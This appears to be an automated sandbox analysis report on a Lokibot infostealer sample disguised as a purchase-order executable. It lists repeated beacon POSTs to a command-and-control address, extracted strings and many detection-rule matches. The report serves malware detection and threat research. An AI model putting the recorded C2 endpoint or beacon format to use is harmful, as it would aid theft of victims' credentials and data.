                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: global trafficHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.248.205.66
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_00404ED4 recv,14_2_00404ED4
                        Source: unknownHTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 180Connection: close
                        Source: PO-0Y9005373R664.exe, 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp, PO-0Y9005373R664.exe, 00000009.00000002.2939358140.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://104.248.205.66/index.php/17008709
                        Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                        Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                        Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VvtddClQv.exe, 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: VvtddClQv.exe, VvtddClQv.exe, 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                        Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                        System Summary

                        barindex
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeCode function: 0_2_075B10D00_2_075B10D0
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeCode function: 0_2_010D08A80_2_010D08A8
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeCode function: 0_2_010D7B280_2_010D7B28
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeCode function: 0_2_010D7B380_2_010D7B38
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeCode function: 0_2_04F96FA00_2_04F96FA0
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeCode function: 0_2_04F96F900_2_04F96F90
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeCode function: 0_2_04F95F840_2_04F95F84
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_00AD08A810_2_00AD08A8
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_00AD089910_2_00AD0899
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_00AD7B3810_2_00AD7B38
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_04FB10B010_2_04FB10B0
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_04FB10A110_2_04FB10A1
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_04FB31A810_2_04FB31A8
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_07002AF010_2_07002AF0
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_070057C010_2_070057C0
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_070057D010_2_070057D0
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_0700F31810_2_0700F318
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_0700734010_2_07007340
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_07006F0810_2_07006F08
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_07006EFB10_2_07006EFB
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_07005C0810_2_07005C08
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_07007CDF10_2_07007CDF
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_07007CF010_2_07007CF0
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_07002AE010_2_07002AE0
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_0040549C14_2_0040549C
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_004029D414_2_004029D4
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: String function: 0041219C appears 45 times
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: String function: 00405B6F appears 42 times
                        Source: PO-0Y9005373R664.exeStatic PE information: invalid certificate
                        Source: PO-0Y9005373R664.exeBinary or memory string: OriginalFilename vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1744170270.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1762161732.0000000007550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCasio.dllD vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCasio.dllD vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1745375841.0000000003E64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1758450748.0000000005530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSalmun.dll. vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQUbn.exe0 vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exe, 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCasio.dllD vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exeBinary or memory string: OriginalFilenameQUbn.exe0 vs PO-0Y9005373R664.exe
                        Source: PO-0Y9005373R664.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
